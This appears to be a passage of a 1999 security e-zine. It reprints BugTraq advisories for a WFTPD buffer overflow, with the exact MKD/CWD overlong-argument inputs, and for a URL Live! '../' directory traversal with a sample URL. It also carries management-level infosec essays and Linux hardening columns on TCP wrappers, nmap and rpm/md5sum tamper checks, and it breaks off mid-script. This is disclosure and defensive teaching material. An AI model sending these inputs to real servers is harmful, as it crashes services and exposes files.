               - Microsoft Windows 3.11WfW
               - Microsoft Windows 3.11
               - Microsoft Windows 3.1
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0
               - Microsoft Windows NT 3.5.1
               - Microsoft Windows NT 3.5
             Texas Imperial Software WFTPD 2.34
               - Microsoft Windows 3.11WfW
               - Microsoft Windows 3.11
               - Microsoft Windows 3.1
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0
               - Microsoft Windows NT 3.5.1
               - Microsoft Windows NT 3.5

There is a remotely exploitable buffer overflow vulnerability in WFTPD that is known to affect versions 2.34 and 2.40.
The overflow exists in the MKD and CWD commands, which, if given long string arguments in the right order, can overrun the buffer and allow arbitrary code execution on the target host. This is from the BugTraq posting:

First command

MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command

CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.

credit
First posted to BugTraq by Luciano Martins on Oct 28, 1999.

reference
web page: WFTPD Homepage (Texas Imperial Software)
message: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability (Luciano Martins )

To: BugTraq
Subject: WFTPD v2.40 FTPServer remotely exploitable buffer overflow vulnerability
Date: Wed Oct 27 1999 19:07:55
Author: Luciano Martins
Message-ID:

We found that the WFTPD v2.34, v2.40 Server and earlier are vulnerable to a remotely exploitable buffer overflow. This can result in a denial of service and at worst in arbitrary code being executed on the system.

The vulnerability is the conjunction of two large commands, MKD and CWD, if they are each passed an argument of exactly 255 characters. If these two large commands are passed in order, the program crashes.
Tested in: Windows 98 / Windows NT

Example:

First command

MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command

CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.

Luck Martins
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
WWW.USSRBACK.COM

@HWA

55.0 Pacific Software URL Live! Directory Traversal vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   746
class        Unknown
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        Yes
published    October 28, 1999
updated      October 28, 1999
vulnerable   Pacific Software URL Live! 1.0
               - Microsoft Windows 98
               - Microsoft Windows 95
               - Microsoft Windows NT 4.0

The URL Live! free webserver from Pacific Software is susceptible to the "../" directory traversal vulnerability. By using the '../' string in a URL, an attacker can gain read access to files outside the intended web file structure.

Example:

http ://xyz.com/../../../config.sys

credit
Posted to Bugtraq by UNYUN on October 28, 1999.

reference
web page: URL Live! - A Free HTTP Server by PSPINC (Pacific Software) http://www.urllive.com/
message: URL Live!
1.0 WebServer (UNYUN )

@HWA

56.0 InfoSec for Dummies Parts I and II
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

INFOSEC by Dummies - Part I
Part one of a four part series by John Johnson

October 28, 1999 - Mix some programming code, state-of-the-art hardware, network connections, nerds of all shapes and sizes, hackers, viruses, firewalls, application software, Internet access, World Wide Web sites, and a little oregano, and you will find yourself either at a Microsoft TechNet conference or the front-line of the information security (INFOSEC) battlefield.

I want to go on record that I admire, respect, and will always seek guidance from the many men and women that devote their careers to the information technology profession. I do not blame them in their approach to security professionals as "the bad guys trying to shut down their networks or implement so many security features that the network slows down to a crawl at 10,000 micro bits per second speed." There are many security professionals that are trying to educate information technology people about the threats and vulnerabilities of networks that the real bad guys take advantage of to interfere with the proper function of the network and the information systems connected to it.

However, I want to emphasize that security professionals working in the information security field are providing support services to information technology, not vice versa. The bottom-line mission is that information networks and systems function properly without any loss to confidentiality, integrity, or availability. Most information management personnel are busy maintaining networks and system access, with little time left to audit access control logs and ensure security features enabled function properly. Security patches are implemented when personnel are notified, but security is given the last consideration.
The one positive area in which both information technology and security professionals are able to work closely and effectively is increasing user awareness of computer security issues. That partnership and coordination helps to develop a stronger working relationship for security support to information technology personnel.

As compliance with the Y2K millennium bug problem is resolved, the next priority focus will be computer security. Some approaches to security problems will be technology-based, but there will remain both non-technical problems and security issues that technology cannot address alone. Personnel security, social engineering, application of law and ethics in conducting investigations, the principles of physical security, and contingency planning are examples of such non-technical issues and problems facing information management.

Social engineering is one such non-technical problem that existed long before computers. Many of us with an intelligence background were aware of social engineering techniques for many years. Helping raise user awareness of these techniques and countermeasures to employ is one of the many ways security professionals assist information technology personnel.

Security professionals with a technical understanding of networks and of the various protocols computers use to communicate with each other are the growing area of support into which information security, as part of information assurance, is evolving. But more work is needed, and the information assurance field is addressing those issues, both in developing countermeasures to threats and vulnerabilities and by proactively planning protective measures for the networks of tomorrow.

Security safeguards are intended as procedures and systems designed to protect an organization's ability to perform its basic business function, not to be an obstacle that prevents it. I know many people perceive "security" as a problem to overcome or ignore.
However, from an operational standpoint, the purpose of security measures is to ensure business success.

Stay tuned for the rest of the series:

  Part Two:   Who is in charge? What needs to be protected?
  Part Three: Detailed laundry list of your vulnerabilities
  Part Four:  What is your INFOSEC disaster recovery plan?

John D. Johnson is a security consultant based in California and a former Special Security Officer with the U.S. Government.

INFOSEC by Dummies - Part II

October 29, 1999 - Security is a managerial responsibility; in other words, both senior managers and supervisors are responsible for exercising security in their overall and day-to-day operations. For example, if an employee removes the safety features from their equipment and subsequently gets injured, is it the shop supervisor's responsibility or the safety officer's at the corporate level? Who is in charge of the employee? The same concept applies to security. Maintaining the security of the computers an organization requires for business is part of business management. Who is responsible for the business management of personnel: the supervisor and senior manager of the individual, or the company security manager? Company security managers are responsible for overseeing the security process and coordinating the requirements to accomplish it; they are not responsible for the business functions of company personnel. Rather, they are there to assist the supervisor and senior manager in accomplishing the security portion of computer operations. While a senior manager has overall responsibility for security (as they have for everything else), they obviously cannot perform all the tasks required. Key personnel (including supervisors at all levels) and employees must implement security procedures to ensure that protective measures actually work.

What needs to be protected?

We are increasingly becoming dependent on modern technology that makes us all more productive.
Any disruption to that production limits our ability to get the job done. As I mentioned earlier, information systems and networks operate properly when effective security measures (both technical and procedural) are implemented that protect the confidentiality, integrity, and availability of our information and equipment. Confidentiality is protection from unauthorized disclosure; integrity is protection from unauthorized change or destruction; and availability is protection that ensures that information and equipment are accessible to authorized users when they need them. Easier said than done, but we must try or else suffer the consequences of losing the information or systems that we need to accomplish our work.

Why security?

The most obvious answer is to comply with laws and company policies that require us to take protective measures to safeguard company data and equipment as well as our personnel. But there is more. We need to protect our information and operations to get our work done. We need to protect the privacy of individuals. Protection of information systems permits management at all levels to make sound business decisions based on accurate and timely information. We protect our jobs when we keep pace with technology to implement countermeasures that address new vulnerabilities and threats. We also maintain and improve the integrity and reputation of our organization.

Facts

Let's review some facts.

  Fact: computers are critical to fulfilling your job or supporting your job.
  Fact: computers are vulnerable. Weaknesses in an information system or its components (procedures, hardware designs, internal controls, software bugs, etc.) could be exploited.
  Fact: there are defined threats to your computer system.
While the media highlights stories about hackers, Chinese spies, and intelligence agency Big Brother tactics, the reality is that the insider threat, including accidents and mistakes, is the growing threat, and that people place convenience over security in their day-to-day lives.

What is information security?

The protection of information in all formats, including electronic, hardcopy, magnetic media, etc., against unauthorized access to or modification or destruction of information, whether in storage, processing or transit (across a network), and against the denial of service to authorized users or the provision of service to unauthorized users, including those measures necessary to detect, document and counter such threats. I love short federal government definitions.

Bad things that can happen

Undesirable events that can happen are disclosure of sensitive information, modification of information, destruction of data, unauthorized use of data or information (including by an insider), and denial of service to authorized users. How many of you ever think about overhead water sprinklers soaking your computer equipment in reaction to a false fire alarm late at night? How many of you who send credit card data over your AOL account really think it is safe? Do we ever leave home without our American Express cards anymore?

What are some of the vulnerabilities that computers have? How about the absence of contingency plans, poor user security awareness and training, software errors, poor password selection, vague laws or regulations about computer security overall, open systems, lack of security standardization in the information technology world, poor or limited defenses against automated attacks, and social engineering techniques. Yes, Virginia, there are risks to using computers. But we must use them. The best we can do is use security countermeasures to help reduce that risk.
Increasing threat awareness training is our number one countermeasure to solving the long-term computer security problem. Today, a typical computer can be turned on by anyone, operated by anyone, opened up by anyone, and carried off by anyone. The computer doesn't check your ID when you come up to it. A major reason for the lack of threat awareness by people is the failure to grasp what can be lost through security breaches.

Stay tuned for the rest of the series:

  Part One:   Introduction
  Part Two:   Who is in charge? What needs to be protected?
  Part Three: Detailed laundry list of your vulnerabilities (coming November 4)
  Part Four:  What is your INFOSEC disaster recovery plan? (coming November 5)

John D. Johnson is a security consultant based in California and a former Special Security Officer with the U.S. Government.

@HWA

57.0 Thwarting the systems cracker parts 1 to 6
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thwarting the System Cracker, Part 1
by Marcel Gagné
23-Sep-1999

Welcome to your weekly dose of System Administration. Before we dive headlong into this week's topic, allow me a quick introduction. This column is the first of a weekly series in which I intend to tackle stories and ideas that are near and dear to the Linux system and network administrator's heart. My plan is to address issues for users of all levels--from the person who was made administrator because he or she dared admit they "knew a little about computers" (often followed with "Congratulations! You are now in charge of the entire company's IT well-being.") to the experienced, married-to-the-job systems and network people who go home and dream about print queues, system performance, resource management, and penguins.

That said, I invite readers to e-mail me (mggagne@salmar.com) and let me know what topics you would like to see covered that relate to the care and feeding of Linux servers and how to keep them healthy and happy. As time goes on, I'll try to deal with as many of those issues as I can.
'Nuff said! Let's move on to this week's topic: the growing scourge of the network cracker ...

In the last few months, I've answered an increasing number of calls from people whose systems have been cracked. Usually they're not aware of this, and the call starts out more like: "There seems to be something wrong with my e-mail. Could you have a look at it?" I log on, do a quick look around and see his footprints everywhere. A wily cracker has struck again.

When you set up your Linux system, you brought up a powerful, high-level, multi-tasking network operating system--one that was maybe a little too powerful. Out of the box, some distributions start a large number of services (rlogind, inetd, httpd, innd, fingerd, timed, rhsd, and others). Do you know what they all are? I do. As Sys Admin, you've got enough things to worry about, such as that hung printer, but if your machine is exposed to the Internet, you should pay particular attention.

Most crackers don't tend to be innovators. They use the latest distributed exploits (programs and/or techniques) to break through a well-known or recently uncovered security hole in your system. The good news is that you, as a security administrator, are just as capable of becoming aware of these exploits. Regular visits to your Linux distribution's web site, such as Red Hat or Caldera Systems, are a good way to stay on top of the latest patches to stop those exploits. While you're at it, find out about the exploits themselves by checking out the bugtraq forum or CERT, to name just a couple.

Innovators or not, cracking a system is made so much easier if the door to your server is left wide open. The simplest means of controlling access (short of turning off your machine) is through a program called a TCP wrapper. Odds are you loaded it as part of your system install. Using the wrapper, we can restrict access to some of those services I mentioned earlier.
Best of all, the wrapper logs attempts to gain entry to your system, so you can track who is testing the locks on your virtual doors. If you do not need to have people logging in to your system (using telnet or rlogin), then you should close the door to remote access by adding this line to your /etc/hosts.deny file:

    ALL:ALL

The first ALL refers to all services. The second ALL refers to everybody. Nobody gets in. Y'hear?

Now, we should probably let the people on your internal network have access (no?). I'll pretend you've set up your LAN with the approved internal network addressing scheme as detailed in RFC 1918 (What's an RFC? Hmm ... we do have a lot to cover.) I'll use a class C network at 192.168.1.x for our example. We'll also add your localhost (127.0.0.1) network. Here's the hosts.allow entry:

    ALL: 127.0.0.1
    ALL: 192.168.1.

Yes, that's right. There's a dot after the one and nothing else. Now everyone in the 192.168.1.whatever network can get in to your system. Now, restart your inetd process.

    /etc/rc.d/init.d/inet restart

Safe, right? Not exactly. The hosts.deny file controls access only to services listed in /etc/inetd.conf and wrapped by /usr/bin/tcpd, your TCP wrapper. The wrapper looks at incoming network requests, compares them to what is in your hosts.allow and hosts.deny files, and makes a yes or no decision on what to allow through. You could be running services not covered by the wrapper, or you may not have had the wrapper configured and our cracker has already gotten through. How can you tell? How can you make your system even more secure? More on that next week. Until then, fix that printer, will you?

Thwarting the System Cracker, Part 2
by Marcel Gagné
4-Oct-1999

Reading the trail: what a TCP wrapper can tell you.

Hello everyone. Thanks for coming back. Thanks also for the enormous feedback on last week's article. The vast majority seemed to appreciate my "start small and work your way up" approach to administration.
While security administration may seem like an enormous topic to start with, I thought it was important enough to cover now rather than later. As mentioned, I will take all comments into consideration and try to gear this series around the majority of those suggestions.

Last week, I provided some insight into the simplest method of protecting your system, the TCP wrapper. Your Linux system does a great job of tracking access through its system logs, and denying access through the wrapper means you've just added some useful information to those logs. Change to the /var/log directory and list the files there with ls.

    # cd /var/log
    # ls

Here's a sample of what you should see there.

    boot.log     cron        cron.1        cron.2        dmesg
    httpd        lastlog     lastlog.1     maillog       maillog.1
    maillog.2    messages    messages.1    netconf.log   netconf.log.1
    netconf.log.2  secure    secure.1      secure.2      secure.3
    secure.4     spooler     spooler.1     spooler.2     uucp
    wtmp         wtmp.1      xferlog       xferlog.1     xferlog.2

Notice how the various log files have a dot-1, 2, 3, or dot-4 extension. This happens on a regular basis when your system runs its cron.daily files. Actually, cron.daily is a directory under /etc and contains a number of administration scripts that your system runs automatically. Without you lifting a finger, Linux uses these scripts to keep things tidy, such as rotating your log files so they don't grow to enormous proportions (like in the old days of UNIX, when I had to walk 14 miles to school uphill in both directions and had to do my own log file pruning). Have a look at those cron jobs, and familiarize yourself with what happens there. These are text files--you can more them, or vi them, or read them in emacs. While you are at it, notice that the system also has a cron.hourly, cron.weekly, and cron.monthly. A couple of those directories may be empty. The actual dates and times for hourly, weekly, and so on are in the /etc/crontab file.

From a cracker detection point of view, your secure.? files will be of particular interest.
If you turned off all access (other than your local network) as described last week, you can check for possible attempts like this:

    grep refused /var/log/secure*

Here's the output of an actual attempt. I've blanked out the address for (ahem) security reasons.

    Sep 12 07:52:42 netgate in.rlogind[7138]: refused connect from 2??.?.5?.?42
    Sep 12 07:52:52 netgate in.rshd[7139]: refused connect from 2??.?.5?.?42
    Sep 12 07:52:55 netgate in.rexecd[7144]: refused connect from 2??.?.5?.?42
    Sep 12 07:52:59 netgate imapd[7146]: refused connect from 2??.?.5?.42
    Sep 12 07:52:59 netgate in.fingerd[7142]: refused connect from 2??.?.5?.?42
    Sep 12 07:53:00 netgate ipop3d[7143]: refused connect from 2??.?.5?.?42
    Sep 12 07:53:07 netgate in.ftpd[7147]: refused connect from 2??.?.5?.?42
    Sep 12 07:53:10 netgate gn[7145]: refused connect from 2??.?.5?.?42
    Sep 12 07:53:22 netgate in.telnetd[7149]: refused connect from 2??.?.5?.?42
    Sep 12 07:56:34 netgate imapd[7150]: refused connect from 2??.?.5?.?42

As you can see, my cracker tried several ports, or services, on my server, netgate, all of which were refused because of my wrapper's configuration, and the logs record it. I took the information from this log and e-mailed it to the security authority of the ISP the cracker was using. Now, this doesn't mean the cracker will never get in, but you know they are trying and that's a great start.

You can also more some of the other files for additional information. The maillog files will give you a picture of what e-mail messages are routing through your machine. If you'd like to see ftp transfers to and from your machine, have a look at the xferlog files. The other file of interest here is wtmp. To view the contents of wtmp, use the last command--you cannot simply cat or more this file. However, you might want to pipe the output of last to more.
    # last | more
    fishduck  ttyp6  nexus   Tue Sep 28 16:03   still logged in
    birdrat   ttyp5  speedy  Tue Sep 28 15:57   still logged in
    root      tty1           Tue Sep 28 12:54   still logged in

This will give you the contents of the wtmp file, which details who logged in when, for how long, and whether they are still logged in. Make sure these are all people who you want to have access. Maybe you don't know who birdrat is. If you haven't checked your logs in a while and you would like to see what is in wtmp.1, use this version of the last command:

    # last -f /var/log/wtmp.1 | more

The last thing (no pun intended) I would like you to consider this week is the state of the logs themselves. If you find too little activity in your logs, or the logs tend to be sized at zero bytes or missing altogether, that is also important information. Knowing something is amiss is the first step towards doing something about it.

I've run out of space for this week, but let me finish by giving you a hint of where we'll go next. We'll visit the various services, discuss what they do, and decide whether you need them at all. As a treat, I'll show how to use a popular hacker tool, the port scanner, to better secure your own system.

Thwarting the System Cracker, Part 3
by Marcel Gagné
7-Oct-1999

Getting to know your enemy through network ports and port scanners.

For the serious newbies out there, here's how networks work on a really, really basic level. Your system's master process, the one that got the system going (after you pushed the 'on' switch, that is) is called 'init'. init's process ID is 1. It is always 1. If you want to check it out, find init in your process table using 'ps'.

    # ps ax | grep init
        1 ?  S    6:03 init

One of the services that init starts when your system boots is 'inetd'. Its job is to listen for network requests, which it references by way of internet socket numbers or ports.
For instance, when you telnet to your system by typing "telnet mysystem", you are actually requesting that inetd on mysystem start an in.telnetd process which handles communication over port 23. Then, in.telnetd starts a process which eventually asks for your login name and password and, miraculously, you are logged in. Basically, inetd listens to find out what other daemons should wake up to answer the port request. If you want to see what those service numbers translate to, do a 'more' (or 'less') on /etc/services, a text file that lists the known TCP service ports. From a resources perspective, it makes sense to have a single process listening rather than one for each and every service. For those of you who can remember and visualize such things, picture Lily Tomlin as the telephone operator who (eventually) patches people through to the party to whom they wished to speak. She is inetd and the people to whom you wish to speak are the service daemons. You request extension 23 and eventually, she puts you through.

When inetd starts, it reads a file called inetd.conf. You'll find this one in your '/etc' directory. Here are a couple of sample lines from inetd.conf.

    #
    # These are standard services.
    #
    ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
    telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
    #
    # Shell, login, exec, comsat and talk are BSD protocols.
    #
    shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
    login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind
    #exec   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rexecd

When a cracker first visits your site with the intention of breaking in, he will often employ a tool known as a port scanner to find out what inetd is listening for on your system. One of my favorite port scanners is nmap. You can pick up nmap from http://www.insecure.org/nmap/index.html. The latest version even comes with a nice GUI front end called nmapfe. Let's run nmap against my test system and see what we get.
The options are '-sS', for a TCP SYN, or half-open, scan, and '-O', for OS fingerprinting. OS fingerprinting means that nmap will try to guess the OS version running on the system. A cracker who knows what release of an OS you are running will use that information to decide on the most likely exploits for a successful entry. Here's the nmap command and the output from my test system.

    # nmap -sS -O localhost

    Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
    Interesting ports on localhost (127.0.0.1):
    Port    State       Protocol  Service
    21      open        tcp       ftp
    23      open        tcp       telnet
    25      open        tcp       smtp
    53      open        tcp       domain
    79      open        tcp       finger
    80      open        tcp       http
    98      open        tcp       linuxconf
    111     open        tcp       sunrpc
    113     open        tcp       auth
    139     open        tcp       netbios-ssn
    513     open        tcp       login
    514     open        tcp       shell
    515     open        tcp       printer

    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=4360068 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.2.12

    Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds

Those open ports are the jumping-off point for your cracker. With this information, they know what to bother with and what to forget about. If there is no daemon listening on a network port, why bother trying to get in that way?

Now, go back and look at your /etc/inetd.conf file. Notice that exec is commented out (there's a hash mark, '#', or octothorpe, at the beginning of the line) but login is not. If you cross-reference that with the output of nmap, you'll see that those services not commented out in inetd.conf are listed while those with the hash mark at the beginning are not. This is how you shut down unnecessary ports monitored by inetd. Your TCP wrapper is keeping an eye on those ports, but if no one needs to have access to remote shell, why have inetd listen for it at all? The wrapper's job is to provide access to specific services for specific IP addresses. In the first article, we did the quick lock-down with the wrapper.
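An added example, not the column's own code, that applies what inetd.conf shows: it lists the services inetd would start (resolving port numbers through a services file, as nmap's Service column does) and comments a service out without hand-editing. It runs on constructed copies of inetd.conf and /etc/services, so nothing in /etc is touched.

```shell
#!/bin/sh
# Work out which services inetd is actually listening for, straight from
# inetd.conf, and comment one out without hand-editing. Added example, not
# from the column; the sample files below are constructed.

# enabled_services CONF SERVICES: print "service port/proto daemon" for
# every line of CONF that is not blank or commented out, resolving the port
# number through SERVICES (a file in /etc/services format).
enabled_services() {
    awk -v svcfile="$2" '
    BEGIN {
        # Build name/proto -> port from the services file.
        while ((getline line < svcfile) > 0) {
            if (line ~ /^[ \t]*(#|$)/) continue
            split(line, f, /[ \t]+/)
            split(f[2], pp, "/")            # "23/tcp" -> port 23, proto tcp
            port[f[1] "/" pp[2]] = pp[1]
        }
    }
    /^[ \t]*(#|$)/ { next }                 # skip comments and blank lines
    {
        key = $1 "/" $3
        p = (key in port) ? port[key] : "?"
        # When the entry goes through tcpd, the real daemon is field 7.
        daemon = ($6 ~ /tcpd$/ && NF >= 7) ? $7 : $6
        print $1, p "/" $3, daemon
    }' "$1"
}

# disable_service CONF NAME: write a copy of CONF with every active line for
# service NAME commented out and everything else untouched. Prints the path
# of the new file; installing it and sending inetd its SIGHUP (kill -HUP,
# never kill 1) is left to the administrator.
disable_service() {
    out=$(mktemp)
    awk -v name="$2" '
    $1 == name && $0 !~ /^[ \t]*#/ { print "#" $0; next }
    { print }' "$1" > "$out"
    echo "$out"
}

# Constructed sample files in the formats shown in the article.
INETD_CONF=$(mktemp)
cat > "$INETD_CONF" <<'EOF'
# These are standard services.
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
# Shell, login, exec, comsat and talk are BSD protocols.
shell   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rshd
login   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rlogind
#exec   stream  tcp     nowait  root    /usr/sbin/tcpd  in.rexecd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
EOF
SERVICES=$(mktemp)
cat > "$SERVICES" <<'EOF'
ftp     21/tcp
telnet  23/tcp
finger  79/tcp
exec    512/tcp
login   513/tcp
shell   514/tcp
EOF

echo "--- enabled ---"
enabled_services "$INETD_CONF" "$SERVICES"
NEWCONF=$(disable_service "$INETD_CONF" shell)
echo "--- after disabling shell ---"
enabled_services "$NEWCONF" "$SERVICES"
```

Compare the first listing with nmap's output: any open port that is not in it is a daemon inetd did not start, and therefore one the wrapper is not watching.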
Now, go through your list of services, decide what you need and what you don't, then disable the don'ts by commenting out those lines. To activate the changes, you need to restart inetd. Find inetd's process id and send a SIGHUP to it. That means you do a 'kill -1' on the process. BE CAREFUL. A 'kill dash 1' looks an awful lot like a 'kill 1'. Do you remember what process had id 1? Kill init and you kill the whole system. If you are worried and don't mind typing a few extra keystrokes, use 'kill -SIGHUP' instead of 'kill -1'. Now, let's re-run nmap.

    Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
    Interesting ports on localhost (127.0.0.1):
    Port    State       Protocol  Service
    21      open        tcp       ftp
    23      open        tcp       telnet
    25      open        tcp       smtp
    53      open        tcp       domain
    80      open        tcp       http
    111     open        tcp       sunrpc
    113     open        tcp       auth
    139     open        tcp       netbios-ssn
    515     open        tcp       printer

    TCP Sequence Prediction: Class=random positive increments
                             Difficulty=3487082 (Good luck!)
    Remote operating system guess: Linux 2.1.122 - 2.2.12

    Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds

This last run is the same as the previous one from a command standpoint, but finger, linuxconf, shell, and login are gone. I could argue that the smart thing would have been to leave rlogin in place and deactivate telnet, but keep in mind that this is an example. Disabling telnet may not be appropriate for your location. For those services that are run by inetd, disabling them in this manner completely removes them from external access, even beyond your /etc/hosts.allow file (discussed in the first part of this series).

What should you disable? If you are running a single, private machine that does not require anyone in the outside world to access it, then just about everything in the list could go. However, if you have a small network with a couple of PCs, you may still want to run ftp, telnet, or rlogin.

One final note. Use tools like port scanners wisely.
Use them only to test the security of your own systems and never, never use them to scan other people's systems. Remember, just as you are learning to deal with and watch for the cracker, so can others watch you.

You're right. There's lots more, but once again, I've gone way over my allotted space for the week. Next time around, I'll show you how your system package tools can help you determine if some of your files have been compromised. Until then, take care, and happy hunting.

Thwarting the System Cracker, Part 4
by Marcel Gagné
14-Oct-1999

This week's episode: verifying the integrity of your files.

Comedian Steven Wright expresses an interesting dilemma. Someone broke into his house, he says, stole everything and replaced all those things with an identical copy. In the world of the system cracker, this isn't such a crazy idea. Here's what happens. Using some well-known hole or exploit, a cracker finds his or her way onto your system. Yet, when you do a "ps", there is no evidence. When you do an "ls", there is no evidence. You think your password file looks normal but you can't be sure. What to do?

One of the first things your cracker will do is replace certain files on your system. You will wind up with a new version of "netstat" so that a "netstat -a" does not show any evidence of your cracker's presence. The cracker will also replace any file that might give him or her away. Some of those files are as follows.

    /bin/ps
    /bin/netstat
    /usr/bin/top

Since the files have been replaced, simply doing an "ls" will only confirm that the files are there. There are a number of ways that you can detect modified files on your system. If you are running Red Hat, Caldera, TurboLinux, or any of the releases that use the Red Hat Package Manager (aka RPM) concept, I'm going to show you a cool way to do this. The first thing you need to do is find out what package these files came from.
Using the rpm command, you can identify the package a file (say "netstat") belongs to with this version of the command.

    # rpm -qf /bin/netstat

The system comes back with this reply.

    net-tools-1.51-3

Now, I can scan this entire package to find out what has been changed with this version of the rpm command.

    rpm -V net-tools

(You can leave off the version info.) Now, on my test system, I've modified my "/bin/netstat" binary (I replaced the 6.0 version with 5.2 in this case). The result of the above command should be nothing -- a return to the shell prompt (the hash mark). Instead, I get this.

    .......T /bin/netstat

The "/bin/netstat" file shows up as having been modified. If I check using rpm (rpm -qf /bin/ps) for the package that "ps" and "/usr/bin/top" belong to, I find that they belong to the "procps" package. I will then run an rpm verify on procps. Here's a sample output from a hacked system.

    # rpm -qf /bin/ps
    procps.2.0.2-2
    # rpm -V procps
    SM5..UGT /bin/ps
    SM5..UGT /usr/bin/top

Our cracker has gone in and replaced our version of "ps" and "top" so that we cannot see the processes he is running, maybe a sniffer or IRC "bots". The sniffer, by the way, is a program that essentially watches all your users' comings and goings and traps their passwords so that the cracker can use valid user logins to do their work, further hiding their tracks.

I'll give you a quick script now to run through your entire rpm database and check all your packages for tampering. Before I do that, I want to give you a warning. Not all files flagged by this report are hacked. For instance, the password file on your system is not the same as it was when it was first installed. After all, you added at least one user and changed at least one password. Any file that is different from the original install will show up as modified. Binaries, or compiled programs like netstat, should never show up in this list. Here's the little script.
    #!/bin/bash
    #
    # Run through rpm database and report inconsistencies
    #
    for rpmlist in `rpm -qa`    # These quotes are back quotes
    do
        echo " ----- $rpmlist -----" ; rpm -V $rpmlist
    done > /tmp/rpmverify.out

When you run this script, the output is redirected to the temporary file "/tmp/rpmverify.out". You can use "more" or "less" to view the contents of the file.

Since I mentioned that configuration and text files (/etc/passwd, /etc/inetd.conf, etc) will very likely show up as changed when you run this script, how do you know if these are your changes and not those of your cracker? If your system is pristine, or in a state you can be sure of--such as immediately after an install or an upgrade--you can take "fingerprints" of your files, print out the information and refer to it if you suspect something has changed. A way to do this is with md5sum -- those without rpm (Debian, Slackware, etc) can use this method to fingerprint their binaries as well. Here's the way to do it. I'll use a few files, including some binaries.

    # md5sum /etc/passwd
    d8439475fac2ea638cbad4fd6ca4bc22  /etc/passwd
    # md5sum /bin/ps
    6d16efee5baecce7a6db7d1e1a088813  /bin/ps
    # md5sum /bin/netstat
    b7dda3abd9a1429b23fd8687ad3dd551  /bin/netstat

Please note. These are the numbers from my system. You don't want to write these down. The information will vary based on release and what you have in your text and configuration files. Other than the ones mentioned, you might want to check the following. Remember, print the results out and check them from time to time to help you determine if the wily cracker has entered your domain. Here are those files.

    /usr/bin/passwd
    /sbin/portmap
    /bin/login
    /bin/ls
    /usr/bin/top
    /etc/inetd.conf
    /etc/services

This should give you a good starting point. Crackers will not change every file on your system, and monitoring a few specific files is enough to give you a good idea as to whether or not something has been changed without your knowledge.
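The md5sum fingerprints above, taken by hand and printed out, become a repeatable check in this added example (not the author's script): one function records hashes for a list of files, another re-hashes them and reports OK, CHANGED or MISSING. It demonstrates on a constructed scratch tree rather than on the real /bin and /etc/passwd, so it runs without root; the file names in that tree are illustrative.

```shell
#!/bin/sh
# Take and later verify md5 fingerprints of a fixed list of files.
# Added example, not the author's; the scratch tree below is constructed.

# Use md5sum where present (Linux), fall back to BSD md5 otherwise.
hash_file() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# make_baseline FILE...: print "hash path" for each file that exists.
# Save the output somewhere the cracker cannot edit (paper, removable media).
make_baseline() {
    for f in "$@"; do
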